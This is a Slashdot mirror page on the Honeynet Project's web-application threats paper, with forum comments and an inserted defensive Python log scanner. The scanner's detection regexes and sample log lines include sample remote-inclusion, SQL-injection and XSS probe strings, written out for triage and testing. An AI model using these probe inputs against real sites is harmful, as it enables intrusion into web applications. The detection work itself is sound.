Slashdot Mirror


Honeynet Delineates Web Application Threats

An anonymous reader sends us to a technical white paper written by the Honeynet Project & Research Alliance: Know Your Enemy: Web Application Threats. Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting web servers. Included are code injection, remote code inclusion, SQL injection, cross-site scripting, and exploitation of the PHPShell application.

3 of 40 comments

  1. Hear that understanding? by Anonymous Coward · Score: 2, Insightful

    Or maybe like the science articles the subject flies over most heads. Just because it's called "news for nerds" doesn't mean that the majority have a nerds understanding. Now the YRO section is more illustrative of what slashdot has become.

    1. Re:Hear that understanding? by Anonymous Coward · Score: 1, Insightful

      It might have gone over non-web developers' heads, I'm not arguing over that (I'd still expect the chair/soviet russia/does it run linux/imagine a beowulf cluster/whatever memes to be here though).

      But for the other part of /.'ers that develop web apps, this stuff is rather obvious. The same old issues:
      - register globals - 'nuff said
      - SQL injection (rather crappy explanation, and an extremely basic one here - there are FAR better articles on this!)
      - people not validating stuff before they use it
      - XSS
      etc.

      Along with the same old attacks we've been seeing in server logs for ages (as long as it's updated and secured properly, it shouldn't be a problem), and more of the TOTALLY obvious (blog comment spam? o rly? people creating accounts for phishing? how surprising!)

      There's really nothing new here at all. And it's all rather basic. There's nothing to argue over.

      If you're a web developer and any of this (basic web app security) is new to you, then your apps shouldn't be exposed to the internet!

      I suppose you're right though. We see a lot more comments when it's about the (RI|MP)AA, DRM, GPL, SCO and the like. Kind of sad IMO. Haven't seen too many good articles in the developer section in a while either... Actually, there haven't been any interesting articles (or comments to mod up) in the last couple of days.
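As an added illustration of the "same old attacks we've been seeing in server logs" that the comment and the paper both refer to, here is a small Python scanner that classifies access-log entries by the attack classes the Honeynet paper lists (remote code inclusion, SQL injection, cross-site scripting, PHPShell probes). This is example code written for this page, not code from the Honeynet Project paper or from Slashdot; the log lines are constructed for the demo, the IP addresses are documentation ranges, and the signatures are deliberately minimal, the kind that catch unobfuscated mass probing rather than a careful attacker. Proper input validation and parameterised queries in the application remain the real control; log classification like this is for triage and trending.

```python
"""Classify HTTP access-log entries by web-application attack class.

Added example, not from the Honeynet paper. Signatures are intentionally
simple and matched against percent-decoded parameter values; they are a
triage aid for noisy probes, not a substitute for input validation.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" log format; only ip, method, path and status are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r"(?P<status>\d{3}) "
)

# Checks run against each decoded query-parameter value: (attack class, pattern).
VALUE_SIGNATURES = [
    # a full URL in a parameter is the classic remote-code-inclusion probe
    ("remote_file_inclusion", re.compile(r"^(https?|ftp)://", re.I)),
    # tautology, UNION-based extraction, or trailing comment to truncate the query
    ("sql_injection", re.compile(r"\bunion\b.+\bselect\b|'\s*or\s+\S+\s*=\s*\S+|--\s*$", re.I)),
    # script tag, javascript: URL, or inline event handler
    ("xss", re.compile(r"<script\b|javascript:|\bon\w+\s*=", re.I)),
]

# Checks run against the request path only (no query string).
PATH_SIGNATURES = [
    ("phpshell_probe", re.compile(r"/phpshell(\.php)?(/|$)", re.I)),
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(path):
    """Return the sorted list of attack classes whose signatures match this request."""
    parts = urlsplit(path)
    hits = set()
    decoded_path = unquote_plus(parts.path)
    for name, pat in PATH_SIGNATURES:
        if pat.search(decoded_path):
            hits.add(name)
    # parse_qsl decodes once; decoding the value again catches double-encoded probes
    for _key, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote_plus(value)
        for name, pat in VALUE_SIGNATURES:
            if pat.search(decoded):
                hits.add(name)
    return sorted(hits)


def scan_log(lines):
    """Return (ip, path, classes) for every parseable line that triggers a signature."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real pipeline would count these separately
        classes = classify_request(rec["path"])
        if classes:
            findings.append((rec["ip"], rec["path"], classes))
    return findings


# Constructed sample log lines (documentation IP ranges, invented paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2007:10:01:02 +0000] "GET /index.php?page=http://203.0.113.9/x.txt? HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.6 - - [10/Feb/2007:10:01:07 +0000] "GET /news.php?id=1%27%20OR%201=1-- HTTP/1.1" 200 2048 "-" "-"',
    '203.0.113.7 - - [10/Feb/2007:10:01:09 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024 "-" "-"',
    '203.0.113.8 - - [10/Feb/2007:10:01:15 +0000] "GET /tools/phpshell.php HTTP/1.1" 404 300 "-" "-"',
    '198.51.100.2 - - [10/Feb/2007:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "-"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ip, path, classes in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {','.join(classes):24} {path}")
```

The only benign request in the sample (`page=about`) produces no finding, and the unparseable line is skipped rather than crashing the scan; in a real deployment the decode-twice step matters because double percent-encoding is a common way probes slip past naive single-pass filters.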

  2. Re:Not malware or a bot, but still an attack. by tooyoung · Score: 2, Insightful

    How exactly does posting a link 300 times do anything?
    Well, talking about it will give you a nice slashvertisement for Bloomingpedia.org, whatever that is.